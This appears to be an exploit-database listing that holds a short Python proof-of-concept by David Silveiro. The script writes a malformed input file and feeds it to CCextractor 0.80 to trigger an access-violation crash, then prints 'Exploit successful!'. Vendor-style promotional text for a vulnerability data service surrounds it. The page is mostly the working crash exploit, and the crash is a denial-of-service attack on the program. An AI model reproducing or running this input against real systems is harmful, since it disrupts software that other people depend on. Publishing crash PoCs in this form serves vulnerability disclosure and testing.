Lucene search
K

CCextractor 0.80 - Crash (PoC)

🗓️ 31 May 2016 00:00:00Reported by David SilveiroType 
zdt
 zdt
🔗 0day.today👁 21 Views

CCextractor 0.80 Access Violation Crash PoC, Ubuntu 14 LTS, CVE-201

Code
# Exploit Title: CCextractor 0.80 Access Violation Crash
# Date: 31st May 2016
# Exploit Author: David Silveiro (Xino.co.uk)
# Vendor Homepage: http://www.ccextractor.org/
# Software Link: http://www.ccextractor.org/download-ccextractor.html
# Version: 0.80
# Tested on: Ubuntu 14 LTS
# CVE : 0 day
 
from subprocess import call
from shlex import split
from time import sleep
 
 
def crash():
 
    command = './ccextractor crash'
 
    buffer = '\x00\x00\x00\x04ssixssixs'
 
    with open('crash', 'w+b') as file:
        file.write(buffer)
 
    try:
        call(split(command))
        print("Exploit successful!             ")
 
    except:
        print("Error: Something has gone wrong!")
 
 
def main():
 
    print("Author:   David Silveiro                         ")
    print("   CCextractor 0.80 Access Violation Crash       ")
 
    sleep(2) 
 
    crash()
  
 
if __name__ == "__main__":
    main()

#  0day.today [2018-01-09]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 May 2016 00:00Current
7High risk
Vulners AI Score7
21